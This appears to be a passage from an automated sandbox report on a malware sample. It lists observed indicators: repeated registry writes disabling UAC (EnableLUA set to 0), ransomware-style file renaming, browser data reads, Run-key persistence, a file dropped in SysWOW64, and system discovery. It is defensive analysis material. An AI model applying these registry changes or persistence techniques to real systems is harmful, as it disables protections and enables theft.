Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Renames multiple (85) files with added filename extension

ransomware

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\mSgYkYQw\lWwscwwc.exe N/A
N/A N/A C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lWwscwwc.exe = "C:\\Users\\Admin\\mSgYkYQw\\lWwscwwc.exe" C:\Users\Admin\mSgYkYQw\lWwscwwc.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lWwscwwc.exe = "C:\\Users\\Admin\\mSgYkYQw\\lWwscwwc.exe" C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\IOcYUcsQ.exe = "C:\\ProgramData\\RogQUwEA\\IOcYUcsQ.exe" C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\IOcYUcsQ.exe = "C:\\ProgramData\\RogQUwEA\\IOcYUcsQ.exe" C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\shell32.dll.exe C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A
File opened for modification C:\Windows\SysWOW64\shell32.dll.exe C:\ProgramData\RogQUwEA\IOcYUcsQ.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cscript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8dc8d6503cd281dc4bf3ccf8f40b019322043a57c56273513b0e74eb9a4f7f9e.exe N/A
